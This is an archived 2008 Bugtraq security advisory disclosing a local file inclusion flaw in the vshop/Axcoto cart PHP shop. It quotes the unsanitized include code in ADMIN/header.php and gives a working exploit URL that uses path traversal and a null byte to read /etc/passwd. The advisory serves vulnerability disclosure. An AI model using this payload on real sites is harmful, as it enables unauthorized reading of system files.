vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
Subject: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
From: Pepelux <pepelux@xxxxxxxxxxxx>
Date: Wed, 22 Oct 2008 23:47:08 +0200
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:mime-version:content-type:content-transfer-encoding :content-disposition:x-google-sender-auth; bh=zqybSq7kjOtslGT5+4I5II0hy2vWagVU/Wyf2R7c20s=; b=aFCOs8IgZzsFqXfiwDElYQ7aWo9QTUjBQ24ZgGCDvoi7zpQQAbwGymMrLvBeb+Jd3Y M4uOZwJrEmnQqqQiOgFU1fSPPapCKWgMt6KbuQ5cwFJyhSuPJvF6+3HuzhxGsQH8xqN8 9onFSHScIadqIE+9O7uBoym18IpEkprVbG1eI=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition:x-google-sender-auth; b=L7xxRfZ7EsxD4MaJDPPUKH38VIJsnZmOGHE+QH1gEozlFC2NkNeVCGENZg0xLbq04s SqFoALDbWWOAVZDDbda3mVWfgEYvlP94GLZXzu/1xnLkylyfTaCL33Br4+K8O7//yeql qtSAjy9JgBYjCQR8Y1FdppwB+7WnGkMDxFCCM=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Sender: pepeluxx@xxxxxxxxx

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$ Program: vshop - Axcoto cart
$ Version: <= 0.1alpha
$ File affected: ADMIN/header.php
$ Download: http://sourceforge.net/projects/vshop/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org


--Bug --

4.      if (!$language)$language="ch";
5.      include_once("../lib/lang.".$language.".php");



-- Exploit --

http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00

Follow-Ups:
- Re: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
  - From: Jose Luis

Prev by Date: phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)
Next by Date: GoodTech SSH Remote Buffer Overflow Exploit
Previous by thread: phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)
Next by thread: Re: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
Index(es):
- Date
- Thread